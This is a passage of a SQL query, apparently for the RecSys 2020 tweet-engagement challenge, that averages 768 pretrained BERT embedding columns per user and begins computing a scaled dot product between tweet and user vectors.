avg(gap_159) as gap_159,
avg(gap_160) as gap_160,
avg(gap_161) as gap_161,
avg(gap_162) as gap_162,
avg(gap_163) as gap_163,
avg(gap_164) as gap_164,
avg(gap_165) as gap_165,
avg(gap_166) as gap_166,
avg(gap_167) as gap_167,
avg(gap_168) as gap_168,
avg(gap_169) as gap_169,
avg(gap_170) as gap_170,
avg(gap_171) as gap_171,
avg(gap_172) as gap_172,
avg(gap_173) as gap_173,
avg(gap_174) as gap_174,
avg(gap_175) as gap_175,
avg(gap_176) as gap_176,
avg(gap_177) as gap_177,
avg(gap_178) as gap_178,
avg(gap_179) as gap_179,
avg(gap_180) as gap_180,
avg(gap_181) as gap_181,
avg(gap_182) as gap_182,
avg(gap_183) as gap_183,
avg(gap_184) as gap_184,
avg(gap_185) as gap_185,
avg(gap_186) as gap_186,
avg(gap_187) as gap_187,
avg(gap_188) as gap_188,
avg(gap_189) as gap_189,
avg(gap_190) as gap_190,
avg(gap_191) as gap_191,
avg(gap_192) as gap_192,
avg(gap_193) as gap_193,
avg(gap_194) as gap_194,
avg(gap_195) as gap_195,
avg(gap_196) as gap_196,
avg(gap_197) as gap_197,
avg(gap_198) as gap_198,
avg(gap_199) as gap_199,
avg(gap_200) as gap_200,
avg(gap_201) as gap_201,
avg(gap_202) as gap_202,
avg(gap_203) as gap_203,
avg(gap_204) as gap_204,
avg(gap_205) as gap_205,
avg(gap_206) as gap_206,
avg(gap_207) as gap_207,
avg(gap_208) as gap_208,
avg(gap_209) as gap_209,
avg(gap_210) as gap_210,
avg(gap_211) as gap_211,
avg(gap_212) as gap_212,
avg(gap_213) as gap_213,
avg(gap_214) as gap_214,
avg(gap_215) as gap_215,
avg(gap_216) as gap_216,
avg(gap_217) as gap_217,
avg(gap_218) as gap_218,
avg(gap_219) as gap_219,
avg(gap_220) as gap_220,
avg(gap_221) as gap_221,
avg(gap_222) as gap_222,
avg(gap_223) as gap_223,
avg(gap_224) as gap_224,
avg(gap_225) as gap_225,
avg(gap_226) as gap_226,
avg(gap_227) as gap_227,
avg(gap_228) as gap_228,
avg(gap_229) as gap_229,
avg(gap_230) as gap_230,
avg(gap_231) as gap_231,
avg(gap_232) as gap_232,
avg(gap_233) as gap_233,
avg(gap_234) as gap_234,
avg(gap_235) as gap_235,
avg(gap_236) as gap_236,
avg(gap_237) as gap_237,
avg(gap_238) as gap_238,
avg(gap_239) as gap_239,
avg(gap_240) as gap_240,
avg(gap_241) as gap_241,
avg(gap_242) as gap_242,
avg(gap_243) as gap_243,
avg(gap_244) as gap_244,
avg(gap_245) as gap_245,
avg(gap_246) as gap_246,
avg(gap_247) as gap_247,
avg(gap_248) as gap_248,
avg(gap_249) as gap_249,
avg(gap_250) as gap_250,
avg(gap_251) as gap_251,
avg(gap_252) as gap_252,
avg(gap_253) as gap_253,
avg(gap_254) as gap_254,
avg(gap_255) as gap_255,
avg(gap_256) as gap_256,
avg(gap_257) as gap_257,
avg(gap_258) as gap_258,
avg(gap_259) as gap_259,
avg(gap_260) as gap_260,
avg(gap_261) as gap_261,
avg(gap_262) as gap_262,
avg(gap_263) as gap_263,
avg(gap_264) as gap_264,
avg(gap_265) as gap_265,
avg(gap_266) as gap_266,
avg(gap_267) as gap_267,
avg(gap_268) as gap_268,
avg(gap_269) as gap_269,
avg(gap_270) as gap_270,
avg(gap_271) as gap_271,
avg(gap_272) as gap_272,
avg(gap_273) as gap_273,
avg(gap_274) as gap_274,
avg(gap_275) as gap_275,
avg(gap_276) as gap_276,
avg(gap_277) as gap_277,
avg(gap_278) as gap_278,
avg(gap_279) as gap_279,
avg(gap_280) as gap_280,
avg(gap_281) as gap_281,
avg(gap_282) as gap_282,
avg(gap_283) as gap_283,
avg(gap_284) as gap_284,
avg(gap_285) as gap_285,
avg(gap_286) as gap_286,
avg(gap_287) as gap_287,
avg(gap_288) as gap_288,
avg(gap_289) as gap_289,
avg(gap_290) as gap_290,
avg(gap_291) as gap_291,
avg(gap_292) as gap_292,
avg(gap_293) as gap_293,
avg(gap_294) as gap_294,
avg(gap_295) as gap_295,
avg(gap_296) as gap_296,
avg(gap_297) as gap_297,
avg(gap_298) as gap_298,
avg(gap_299) as gap_299,
avg(gap_300) as gap_300,
avg(gap_301) as gap_301,
avg(gap_302) as gap_302,
avg(gap_303) as gap_303,
avg(gap_304) as gap_304,
avg(gap_305) as gap_305,
avg(gap_306) as gap_306,
avg(gap_307) as gap_307,
avg(gap_308) as gap_308,
avg(gap_309) as gap_309,
avg(gap_310) as gap_310,
avg(gap_311) as gap_311,
avg(gap_312) as gap_312,
avg(gap_313) as gap_313,
avg(gap_314) as gap_314,
avg(gap_315) as gap_315,
avg(gap_316) as gap_316,
avg(gap_317) as gap_317,
avg(gap_318) as gap_318,
avg(gap_319) as gap_319,
avg(gap_320) as gap_320,
avg(gap_321) as gap_321,
avg(gap_322) as gap_322,
avg(gap_323) as gap_323,
avg(gap_324) as gap_324,
avg(gap_325) as gap_325,
avg(gap_326) as gap_326,
avg(gap_327) as gap_327,
avg(gap_328) as gap_328,
avg(gap_329) as gap_329,
avg(gap_330) as gap_330,
avg(gap_331) as gap_331,
avg(gap_332) as gap_332,
avg(gap_333) as gap_333,
avg(gap_334) as gap_334,
avg(gap_335) as gap_335,
avg(gap_336) as gap_336,
avg(gap_337) as gap_337,
avg(gap_338) as gap_338,
avg(gap_339) as gap_339,
avg(gap_340) as gap_340,
avg(gap_341) as gap_341,
avg(gap_342) as gap_342,
avg(gap_343) as gap_343,
avg(gap_344) as gap_344,
avg(gap_345) as gap_345,
avg(gap_346) as gap_346,
avg(gap_347) as gap_347,
avg(gap_348) as gap_348,
avg(gap_349) as gap_349,
avg(gap_350) as gap_350,
avg(gap_351) as gap_351,
avg(gap_352) as gap_352,
avg(gap_353) as gap_353,
avg(gap_354) as gap_354,
avg(gap_355) as gap_355,
avg(gap_356) as gap_356,
avg(gap_357) as gap_357,
avg(gap_358) as gap_358,
avg(gap_359) as gap_359,
avg(gap_360) as gap_360,
avg(gap_361) as gap_361,
avg(gap_362) as gap_362,
avg(gap_363) as gap_363,
avg(gap_364) as gap_364,
avg(gap_365) as gap_365,
avg(gap_366) as gap_366,
avg(gap_367) as gap_367,
avg(gap_368) as gap_368,
avg(gap_369) as gap_369,
avg(gap_370) as gap_370,
avg(gap_371) as gap_371,
avg(gap_372) as gap_372,
avg(gap_373) as gap_373,
avg(gap_374) as gap_374,
avg(gap_375) as gap_375,
avg(gap_376) as gap_376,
avg(gap_377) as gap_377,
avg(gap_378) as gap_378,
avg(gap_379) as gap_379,
avg(gap_380) as gap_380,
avg(gap_381) as gap_381,
avg(gap_382) as gap_382,
avg(gap_383) as gap_383,
avg(gap_384) as gap_384,
avg(gap_385) as gap_385,
avg(gap_386) as gap_386,
avg(gap_387) as gap_387,
avg(gap_388) as gap_388,
avg(gap_389) as gap_389,
avg(gap_390) as gap_390,
avg(gap_391) as gap_391,
avg(gap_392) as gap_392,
avg(gap_393) as gap_393,
avg(gap_394) as gap_394,
avg(gap_395) as gap_395,
avg(gap_396) as gap_396,
avg(gap_397) as gap_397,
avg(gap_398) as gap_398,
avg(gap_399) as gap_399,
avg(gap_400) as gap_400,
avg(gap_401) as gap_401,
avg(gap_402) as gap_402,
avg(gap_403) as gap_403,
avg(gap_404) as gap_404,
avg(gap_405) as gap_405,
avg(gap_406) as gap_406,
avg(gap_407) as gap_407,
avg(gap_408) as gap_408,
avg(gap_409) as gap_409,
avg(gap_410) as gap_410,
avg(gap_411) as gap_411,
avg(gap_412) as gap_412,
avg(gap_413) as gap_413,
avg(gap_414) as gap_414,
avg(gap_415) as gap_415,
avg(gap_416) as gap_416,
avg(gap_417) as gap_417,
avg(gap_418) as gap_418,
avg(gap_419) as gap_419,
avg(gap_420) as gap_420,
avg(gap_421) as gap_421,
avg(gap_422) as gap_422,
avg(gap_423) as gap_423,
avg(gap_424) as gap_424,
avg(gap_425) as gap_425,
avg(gap_426) as gap_426,
avg(gap_427) as gap_427,
avg(gap_428) as gap_428,
avg(gap_429) as gap_429,
avg(gap_430) as gap_430,
avg(gap_431) as gap_431,
avg(gap_432) as gap_432,
avg(gap_433) as gap_433,
avg(gap_434) as gap_434,
avg(gap_435) as gap_435,
avg(gap_436) as gap_436,
avg(gap_437) as gap_437,
avg(gap_438) as gap_438,
avg(gap_439) as gap_439,
avg(gap_440) as gap_440,
avg(gap_441) as gap_441,
avg(gap_442) as gap_442,
avg(gap_443) as gap_443,
avg(gap_444) as gap_444,
avg(gap_445) as gap_445,
avg(gap_446) as gap_446,
avg(gap_447) as gap_447,
avg(gap_448) as gap_448,
avg(gap_449) as gap_449,
avg(gap_450) as gap_450,
avg(gap_451) as gap_451,
avg(gap_452) as gap_452,
avg(gap_453) as gap_453,
avg(gap_454) as gap_454,
avg(gap_455) as gap_455,
avg(gap_456) as gap_456,
avg(gap_457) as gap_457,
avg(gap_458) as gap_458,
avg(gap_459) as gap_459,
avg(gap_460) as gap_460,
avg(gap_461) as gap_461,
avg(gap_462) as gap_462,
avg(gap_463) as gap_463,
avg(gap_464) as gap_464,
avg(gap_465) as gap_465,
avg(gap_466) as gap_466,
avg(gap_467) as gap_467,
avg(gap_468) as gap_468,
avg(gap_469) as gap_469,
avg(gap_470) as gap_470,
avg(gap_471) as gap_471,
avg(gap_472) as gap_472,
avg(gap_473) as gap_473,
avg(gap_474) as gap_474,
avg(gap_475) as gap_475,
avg(gap_476) as gap_476,
avg(gap_477) as gap_477,
avg(gap_478) as gap_478,
avg(gap_479) as gap_479,
avg(gap_480) as gap_480,
avg(gap_481) as gap_481,
avg(gap_482) as gap_482,
avg(gap_483) as gap_483,
avg(gap_484) as gap_484,
avg(gap_485) as gap_485,
avg(gap_486) as gap_486,
avg(gap_487) as gap_487,
avg(gap_488) as gap_488,
avg(gap_489) as gap_489,
avg(gap_490) as gap_490,
avg(gap_491) as gap_491,
avg(gap_492) as gap_492,
avg(gap_493) as gap_493,
avg(gap_494) as gap_494,
avg(gap_495) as gap_495,
avg(gap_496) as gap_496,
avg(gap_497) as gap_497,
avg(gap_498) as gap_498,
avg(gap_499) as gap_499,
avg(gap_500) as gap_500,
avg(gap_501) as gap_501,
avg(gap_502) as gap_502,
avg(gap_503) as gap_503,
avg(gap_504) as gap_504,
avg(gap_505) as gap_505,
avg(gap_506) as gap_506,
avg(gap_507) as gap_507,
avg(gap_508) as gap_508,
avg(gap_509) as gap_509,
avg(gap_510) as gap_510,
avg(gap_511) as gap_511,
avg(gap_512) as gap_512,
avg(gap_513) as gap_513,
avg(gap_514) as gap_514,
avg(gap_515) as gap_515,
avg(gap_516) as gap_516,
avg(gap_517) as gap_517,
avg(gap_518) as gap_518,
avg(gap_519) as gap_519,
avg(gap_520) as gap_520,
avg(gap_521) as gap_521,
avg(gap_522) as gap_522,
avg(gap_523) as gap_523,
avg(gap_524) as gap_524,
avg(gap_525) as gap_525,
avg(gap_526) as gap_526,
avg(gap_527) as gap_527,
avg(gap_528) as gap_528,
avg(gap_529) as gap_529,
avg(gap_530) as gap_530,
avg(gap_531) as gap_531,
avg(gap_532) as gap_532,
avg(gap_533) as gap_533,
avg(gap_534) as gap_534,
avg(gap_535) as gap_535,
avg(gap_536) as gap_536,
avg(gap_537) as gap_537,
avg(gap_538) as gap_538,
avg(gap_539) as gap_539,
avg(gap_540) as gap_540,
avg(gap_541) as gap_541,
avg(gap_542) as gap_542,
avg(gap_543) as gap_543,
avg(gap_544) as gap_544,
avg(gap_545) as gap_545,
avg(gap_546) as gap_546,
avg(gap_547) as gap_547,
avg(gap_548) as gap_548,
avg(gap_549) as gap_549,
avg(gap_550) as gap_550,
avg(gap_551) as gap_551,
avg(gap_552) as gap_552,
avg(gap_553) as gap_553,
avg(gap_554) as gap_554,
avg(gap_555) as gap_555,
avg(gap_556) as gap_556,
avg(gap_557) as gap_557,
avg(gap_558) as gap_558,
avg(gap_559) as gap_559,
avg(gap_560) as gap_560,
avg(gap_561) as gap_561,
avg(gap_562) as gap_562,
avg(gap_563) as gap_563,
avg(gap_564) as gap_564,
avg(gap_565) as gap_565,
avg(gap_566) as gap_566,
avg(gap_567) as gap_567,
avg(gap_568) as gap_568,
avg(gap_569) as gap_569,
avg(gap_570) as gap_570,
avg(gap_571) as gap_571,
avg(gap_572) as gap_572,
avg(gap_573) as gap_573,
avg(gap_574) as gap_574,
avg(gap_575) as gap_575,
avg(gap_576) as gap_576,
avg(gap_577) as gap_577,
avg(gap_578) as gap_578,
avg(gap_579) as gap_579,
avg(gap_580) as gap_580,
avg(gap_581) as gap_581,
avg(gap_582) as gap_582,
avg(gap_583) as gap_583,
avg(gap_584) as gap_584,
avg(gap_585) as gap_585,
avg(gap_586) as gap_586,
avg(gap_587) as gap_587,
avg(gap_588) as gap_588,
avg(gap_589) as gap_589,
avg(gap_590) as gap_590,
avg(gap_591) as gap_591,
avg(gap_592) as gap_592,
avg(gap_593) as gap_593,
avg(gap_594) as gap_594,
avg(gap_595) as gap_595,
avg(gap_596) as gap_596,
avg(gap_597) as gap_597,
avg(gap_598) as gap_598,
avg(gap_599) as gap_599,
avg(gap_600) as gap_600,
avg(gap_601) as gap_601,
avg(gap_602) as gap_602,
avg(gap_603) as gap_603,
avg(gap_604) as gap_604,
avg(gap_605) as gap_605,
avg(gap_606) as gap_606,
avg(gap_607) as gap_607,
avg(gap_608) as gap_608,
avg(gap_609) as gap_609,
avg(gap_610) as gap_610,
avg(gap_611) as gap_611,
avg(gap_612) as gap_612,
avg(gap_613) as gap_613,
avg(gap_614) as gap_614,
avg(gap_615) as gap_615,
avg(gap_616) as gap_616,
avg(gap_617) as gap_617,
avg(gap_618) as gap_618,
avg(gap_619) as gap_619,
avg(gap_620) as gap_620,
avg(gap_621) as gap_621,
avg(gap_622) as gap_622,
avg(gap_623) as gap_623,
avg(gap_624) as gap_624,
avg(gap_625) as gap_625,
avg(gap_626) as gap_626,
avg(gap_627) as gap_627,
avg(gap_628) as gap_628,
avg(gap_629) as gap_629,
avg(gap_630) as gap_630,
avg(gap_631) as gap_631,
avg(gap_632) as gap_632,
avg(gap_633) as gap_633,
avg(gap_634) as gap_634,
avg(gap_635) as gap_635,
avg(gap_636) as gap_636,
avg(gap_637) as gap_637,
avg(gap_638) as gap_638,
avg(gap_639) as gap_639,
avg(gap_640) as gap_640,
avg(gap_641) as gap_641,
avg(gap_642) as gap_642,
avg(gap_643) as gap_643,
avg(gap_644) as gap_644,
avg(gap_645) as gap_645,
avg(gap_646) as gap_646,
avg(gap_647) as gap_647,
avg(gap_648) as gap_648,
avg(gap_649) as gap_649,
avg(gap_650) as gap_650,
avg(gap_651) as gap_651,
avg(gap_652) as gap_652,
avg(gap_653) as gap_653,
avg(gap_654) as gap_654,
avg(gap_655) as gap_655,
avg(gap_656) as gap_656,
avg(gap_657) as gap_657,
avg(gap_658) as gap_658,
avg(gap_659) as gap_659,
avg(gap_660) as gap_660,
avg(gap_661) as gap_661,
avg(gap_662) as gap_662,
avg(gap_663) as gap_663,
avg(gap_664) as gap_664,
avg(gap_665) as gap_665,
avg(gap_666) as gap_666,
avg(gap_667) as gap_667,
avg(gap_668) as gap_668,
avg(gap_669) as gap_669,
avg(gap_670) as gap_670,
avg(gap_671) as gap_671,
avg(gap_672) as gap_672,
avg(gap_673) as gap_673,
avg(gap_674) as gap_674,
avg(gap_675) as gap_675,
avg(gap_676) as gap_676,
avg(gap_677) as gap_677,
avg(gap_678) as gap_678,
avg(gap_679) as gap_679,
avg(gap_680) as gap_680,
avg(gap_681) as gap_681,
avg(gap_682) as gap_682,
avg(gap_683) as gap_683,
avg(gap_684) as gap_684,
avg(gap_685) as gap_685,
avg(gap_686) as gap_686,
avg(gap_687) as gap_687,
avg(gap_688) as gap_688,
avg(gap_689) as gap_689,
avg(gap_690) as gap_690,
avg(gap_691) as gap_691,
avg(gap_692) as gap_692,
avg(gap_693) as gap_693,
avg(gap_694) as gap_694,
avg(gap_695) as gap_695,
avg(gap_696) as gap_696,
avg(gap_697) as gap_697,
avg(gap_698) as gap_698,
avg(gap_699) as gap_699,
avg(gap_700) as gap_700,
avg(gap_701) as gap_701,
avg(gap_702) as gap_702,
avg(gap_703) as gap_703,
avg(gap_704) as gap_704,
avg(gap_705) as gap_705,
avg(gap_706) as gap_706,
avg(gap_707) as gap_707,
avg(gap_708) as gap_708,
avg(gap_709) as gap_709,
avg(gap_710) as gap_710,
avg(gap_711) as gap_711,
avg(gap_712) as gap_712,
avg(gap_713) as gap_713,
avg(gap_714) as gap_714,
avg(gap_715) as gap_715,
avg(gap_716) as gap_716,
avg(gap_717) as gap_717,
avg(gap_718) as gap_718,
avg(gap_719) as gap_719,
avg(gap_720) as gap_720,
avg(gap_721) as gap_721,
avg(gap_722) as gap_722,
avg(gap_723) as gap_723,
avg(gap_724) as gap_724,
avg(gap_725) as gap_725,
avg(gap_726) as gap_726,
avg(gap_727) as gap_727,
avg(gap_728) as gap_728,
avg(gap_729) as gap_729,
avg(gap_730) as gap_730,
avg(gap_731) as gap_731,
avg(gap_732) as gap_732,
avg(gap_733) as gap_733,
avg(gap_734) as gap_734,
avg(gap_735) as gap_735,
avg(gap_736) as gap_736,
avg(gap_737) as gap_737,
avg(gap_738) as gap_738,
avg(gap_739) as gap_739,
avg(gap_740) as gap_740,
avg(gap_741) as gap_741,
avg(gap_742) as gap_742,
avg(gap_743) as gap_743,
avg(gap_744) as gap_744,
avg(gap_745) as gap_745,
avg(gap_746) as gap_746,
avg(gap_747) as gap_747,
avg(gap_748) as gap_748,
avg(gap_749) as gap_749,
avg(gap_750) as gap_750,
avg(gap_751) as gap_751,
avg(gap_752) as gap_752,
avg(gap_753) as gap_753,
avg(gap_754) as gap_754,
avg(gap_755) as gap_755,
avg(gap_756) as gap_756,
avg(gap_757) as gap_757,
avg(gap_758) as gap_758,
avg(gap_759) as gap_759,
avg(gap_760) as gap_760,
avg(gap_761) as gap_761,
avg(gap_762) as gap_762,
avg(gap_763) as gap_763,
avg(gap_764) as gap_764,
avg(gap_765) as gap_765,
avg(gap_766) as gap_766,
avg(gap_767) as gap_767
from surfacing_tweets
inner join `recsys2020.pretrained_bert_gap` gap on surfacing_tweets.tweet_id = gap.tweet_id
group by user_id
)
select
1.0 / 768 * (
(tweet_gap.gap_0 * user_surfacing_tweet_vectors.gap_0) +
(tweet_gap.gap_1 * user_surfacing_tweet_vectors.gap_1) +
(tweet_gap.gap_2 * user_surfacing_tweet_vectors.gap_2) +
(tweet_gap.gap_3 * user_surfacing_tweet_vectors.gap_3) +
(tweet_gap.gap_4 * user_surfacing_tweet_vectors.gap_4) +
(tweet_gap.gap_5 * user_surfacing_tweet_vectors.gap_5) +
(tweet_gap.gap_6 * user_surfacing_tweet_vectors.gap_6) +
(tweet_gap.gap_7 * user_surfacing_tweet_vectors.gap_7) +
(tweet_gap.gap_8 * user_surfacing_tweet_vectors.gap_8) +
(tweet_gap.gap_9 * user_surfacing_tweet_vectors.gap_9) +
(tweet_gap.gap_10 * user_surfacing_tweet_vectors.gap_10) +
(tweet_gap.gap_11 * user_surfacing_tweet_vectors.gap_11) +
(tweet_gap.gap_12 * user_surfacing_tweet_vectors.gap_12) +
(tweet_gap.gap_13 * user_surfacing_tweet_vectors.gap_13) +
(tweet_gap.gap_14 * user_surfacing_tweet_vectors.gap_14) +
(tweet_gap.gap_15 * user_surfacing_tweet_vectors.gap_15) +
(tweet_gap.gap_16 * user_surfacing_tweet_vectors.gap_16) +
(tweet_gap.gap_17 * user_surfacing_tweet_vectors.gap_17) +
(tweet_gap.gap_18 * user_surfacing_tweet_vectors.gap_18) +
(tweet_gap.gap_19 * user_surfacing_tweet_vectors.gap_19) +
(tweet_gap.gap_20 * user_surfacing_tweet_vectors.gap_20) +
(tweet_gap.gap_21 * user_surfacing_tweet_vectors.gap_21) +
(tweet_gap.gap_22 * user_surfacing_tweet_vectors.gap_22) +
(tweet_gap.gap_23 * user_surfacing_tweet_vectors.gap_23) +
(tweet_gap.gap_24 * user_surfacing_tweet_vectors.gap_24) +
(tweet_gap.gap_25 * user_surfacing_tweet_vectors.gap_25) +
(tweet_gap.gap_26 * user_surfacing_tweet_vectors.gap_26) +
(tweet_gap.gap_27 * user_surfacing_tweet_vectors.gap_27) +
(tweet_gap.gap_28 * user_surfacing_tweet_vectors.gap_28) +
(tweet_gap.gap_29 * user_surfacing_tweet_vectors.gap_29) +
(tweet_gap.gap_30 * user_surfacing_tweet_vectors.gap_30) +
(tweet_gap.gap_31 * user_surfacing_tweet_vectors.gap_31) +
(tweet_gap.gap_32 * user_surfacing_tweet_vectors.gap_32) +
(tweet_gap.gap_33 * user_surfacing_tweet_vectors.gap_33) +
(tweet_gap.gap_34 * user_surfacing_tweet_vectors.gap_34) +
(tweet_gap.gap_35 * user_surfacing_tweet_vectors.gap_35) +
(tweet_gap.gap_36 * user_surfacing_tweet_vectors.gap_36) +
(tweet_gap.gap_37 * user_surfacing_tweet_vectors.gap_37) +
(tweet_gap.gap_38 * user_surfacing_tweet_vectors.gap_38) +
(tweet_gap.gap_39 * user_surfacing_tweet_vectors.gap_39) +
(tweet_gap.gap_40 * user_surfacing_tweet_vectors.gap_40) +
(tweet_gap.gap_41 * user_surfacing_tweet_vectors.gap_41) +
(tweet_gap.gap_42 * user_surfacing_tweet_vectors.gap_42) +
(tweet_gap.gap_43 * user_surfacing_tweet_vectors.gap_43) +
(tweet_gap.gap_44 * user_surfacing_tweet_vectors.gap_44) +
(tweet_gap.gap_45 * user_surfacing_tweet_vectors.gap_45) +
(tweet_gap.gap_46 * user_surfacing_tweet_vectors.gap_46) +
(tweet_gap.gap_47 * user_surfacing_tweet_vectors.gap_47) +
(tweet_gap.gap_48 * user_surfacing_tweet_vectors.gap_48) +
(tweet_gap.gap_49 * user_surfacing_tweet_vectors.gap_49) +
(tweet_gap.gap_50 * user_surfacing_tweet_vectors.gap_50) +
(tweet_gap.gap_51 * user_surfacing_tweet_vectors.gap_51) +
(tweet_gap.gap_52 * user_surfacing_tweet_vectors.gap_52) +
(tweet_gap.gap_53 * user_surfacing_tweet_vectors.gap_53) +
(tweet_gap.gap_54 * user_surfacing_tweet_vectors.gap_54) +
(tweet_gap.gap_55 * user_surfacing_tweet_vectors.gap_55) +
(tweet_gap.gap_56 * user_surfacing_tweet_vectors.gap_56) +
(tweet_gap.gap_57 * user_surfacing_tweet_vectors.gap_57) +
(tweet_gap.gap_58 * user_surfacing_tweet_vectors.gap_58) +
(tweet_gap.gap_59 * user_surfacing_tweet_vectors.gap_59) +
(tweet_gap.gap_60 * user_surfacing_tweet_vectors.gap_60) +
(tweet_gap.gap_61 * user_surfacing_tweet_vectors.gap_61) +
(tweet_gap.gap_62 * user_surfacing_tweet_vectors.gap_62) +
(tweet_gap.gap_63 * user_surfacing_tweet_vectors.gap_63) +
(tweet_gap.gap_64 * user_surfacing_tweet_vectors.gap_64) +
(tweet_gap.gap_65 * user_surfacing_tweet_vectors.gap_65) +
(tweet_gap.gap_66 * user_surfacing_tweet_vectors.gap_66) +
(tweet_gap.gap_67 * user_surfacing_tweet_vectors.gap_67) +
(tweet_gap.gap_68 * user_surfacing_tweet_vectors.gap_68) +
(tweet_gap.gap_69 * user_surfacing_tweet_vectors.gap_69) +
(tweet_gap.gap_70 * user_surfacing_tweet_vectors.gap_70) +
(tweet_gap.gap_71 * user_surfacing_tweet_vectors.gap_71) +
(tweet_gap.gap_72 * user_surfacing_tweet_vectors.gap_72) +
(tweet_gap.gap_73 * user_surfacing_tweet_vectors.gap_73) +
(tweet_gap.gap_74 * user_surfacing_tweet_vectors.gap_74) +
(tweet_gap.gap_75 * user_surfacing_tweet_vectors.gap_75) +
(tweet_gap.gap_76 * user_surfacing_tweet_vectors.gap_76) +
(tweet_gap.gap_77 * user_surfacing_tweet_vectors.gap_77) +
(tweet_gap.gap_78 * user_surfacing_tweet_vectors.gap_78) +
(tweet_gap.gap_79 * user_surfacing_tweet_vectors.gap_79) +
(tweet_gap.gap_80 * user_surfacing_tweet_vectors.gap_80) +
(tweet_gap.gap_81 * user_surfacing_tweet_vectors.gap_81) +
(tweet_gap.gap_82 * user_surfacing_tweet_vectors.gap_82) +
(tweet_gap.gap_83 * user_surfacing_tweet_vectors.gap_83) +
(tweet_gap.gap_84 * user_surfacing_tweet_vectors.gap_84) +
(tweet_gap.gap_85 * user_surfacing_tweet_vectors.gap_85) +
(tweet_gap.gap_86 * user_surfacing_tweet_vectors.gap_86) +
(tweet_gap.gap_87 * user_surfacing_tweet_vectors.gap_87) +
(tweet_gap.gap_88 * user_surfacing_tweet_vectors.gap_88) +
(tweet_gap.gap_89 * user_surfacing_tweet_vectors.gap_89) +
(tweet_gap.gap_90 * user_surfacing_tweet_vectors.gap_90) +
(tweet_gap.gap_91 * user_surfacing_tweet_vectors.gap_91) +
(tweet_gap.gap_92 * user_surfacing_tweet_vectors.gap_92) +
(tweet_gap.gap_93 * user_surfacing_tweet_vectors.gap_93) +
(tweet_gap.gap_94 * user_surfacing_tweet_vectors.gap_94) +
(tweet_gap.gap_95 * user_surfacing_tweet_vectors.gap_95) +
(tweet_gap.gap_96 * user_surfacing_tweet_vectors.gap_96) +
(tweet_gap.gap_97 * user_surfacing_tweet_vectors.gap_97) +
(tweet_gap.gap_98 * user_surfacing_tweet_vectors.gap_98) +
(tweet_gap.gap_99 * user_surfacing_tweet_vectors.gap_99) +
(tweet_gap.gap_100 * user_surfacing_tweet_vectors.gap_100) +
(tweet_gap.gap_101 * user_surfacing_tweet_vectors.gap_101) +
(tweet_gap.gap_102 * user_surfacing_tweet_vectors.gap_102) +
(tweet_gap.gap_103 * user_surfacing_tweet_vectors.gap_103) +
(tweet_gap.gap_104 * user_surfacing_tweet_vectors.gap_104) +
(tweet_gap.gap_105 * user_surfacing_tweet_vectors.gap_105) +
(tweet_gap.gap_106 * user_surfacing_tweet_vectors.gap_106) +
(tweet_gap.gap_107 * user_surfacing_tweet_vectors.gap_107) +
(tweet_gap.gap_108 * user_surfacing_tweet_vectors.gap_108) +
(tweet_gap.gap_109 * user_surfacing_tweet_vectors.gap_109) +
(tweet_gap.gap_110 * user_surfacing_tweet_vectors.gap_110) +
(tweet_gap.gap_111 * user_surfacing_tweet_vectors.gap_111) +
(tweet_gap.gap_112 * user_surfacing_tweet_vectors.gap_112) +
(tweet_gap.gap_113 * user_surfacing_tweet_vectors.gap_113) +
(tweet_gap.gap_114 * user_surfacing_tweet_vectors.gap_114) +
(tweet_gap.gap_115 * user_surfacing_tweet_vectors.gap_115) +
(tweet_gap.gap_116 * user_surfacing_tweet_vectors.gap_116) +
(tweet_gap.gap_117 * user_surfacing_tweet_vectors.gap_117) +
(tweet_gap.gap_118 * user_surfacing_tweet_vectors.gap_118) +
(tweet_gap.gap_119 * user_surfacing_tweet_vectors.gap_119) +
(tweet_gap.gap_120 * user_surfacing_tweet_vectors.gap_120) +
(tweet_gap.gap_121 * user_surfacing_tweet_vectors.gap_121) +
(tweet_gap.gap_122 * user_surfacing_tweet_vectors.gap_122) +
(tweet_gap.gap_123 * user_surfacing_tweet_vectors.gap_123) +
(tweet_gap.gap_124 * user_surfacing_tweet_vectors.gap_124) +
(tweet_gap.gap_125 * user_surfacing_tweet_vectors.gap_125) +
(tweet_gap.gap_126 * user_surfacing_tweet_vectors.gap_126) +
(tweet_gap.gap_127 * user_surfacing_tweet_vectors.gap_127) +
(tweet_gap.gap_128 * user_surfacing_tweet_vectors.gap_128) +
(tweet_gap.gap_129 * user_surfacing_tweet_vectors.gap_129) +
(tweet_gap.gap_130 * user_surfacing_tweet_vectors.gap_130) +
(tweet_gap.gap_131 * user_surfacing_tweet_vectors.gap_131) +
(tweet_gap.gap_132 * user_surfacing_tweet_vectors.gap_132) +
(tweet_gap.gap_133 * user_surfacing_tweet_vectors.gap_133) +
(tweet_gap.gap_134 * user_surfacing_tweet_vectors.gap_134) +
(tweet_gap.gap_135 * user_surfacing_tweet_vectors.gap_135) +
(tweet_gap.gap_136 * user_surfacing_tweet_vectors.gap_136) +
(tweet_gap.gap_137 * user_surfacing_tweet_vectors.gap_137) +
(tweet_gap.gap_138 * user_surfacing_tweet_vectors.gap_138) +
(tweet_gap.gap_139 * user_surfacing_tweet_vectors.gap_139) +
(tweet_gap.gap_140 * user_surfacing_tweet_vectors.gap_140) +
(tweet_gap.gap_141 * user_surfacing_tweet_vectors.gap_141) +
(tweet_gap.gap_142 * user_surfacing_tweet_vectors.gap_142) +
(tweet_gap.gap_143 * user_surfacing_tweet_vectors.gap_143) +
(tweet_gap.gap_144 * user_surfacing_tweet_vectors.gap_144) +
(tweet_gap.gap_145 * user_surfacing_tweet_vectors.gap_145) +
(tweet_gap.gap_146 * user_surfacing_tweet_vectors.gap_146) +
(tweet_gap.gap_147 * user_surfacing_tweet_vectors.gap_147) +
(tweet_gap.gap_148 * user_surfacing_tweet_vectors.gap_148) +
(tweet_gap.gap_149 * user_surfacing_tweet_vectors.gap_149) +
(tweet_gap.gap_150 * user_surfacing_tweet_vectors.gap_150) +
(tweet_gap.gap_151 * user_surfacing_tweet_vectors.gap_151) +
(tweet_gap.gap_152 * user_surfacing_tweet_vectors.gap_152) +
(tweet_gap.gap_153 * user_surfacing_tweet_vectors.gap_153) +
(tweet_gap.gap_154 * user_surfacing_tweet_vectors.gap_154) +
(tweet_gap.gap_155 * user_surfacing_tweet_vectors.gap_155) +
(tweet_gap.gap_156 * user_surfacing_tweet_vectors.gap_156) +
(tweet_gap.gap_157 * user_surfacing_tweet_vectors.gap_157) +
(tweet_gap.gap_158 * user_surfacing_tweet_vectors.gap_158) +
(tweet_gap.gap_159 * user_surfacing_tweet_vectors.gap_159) +
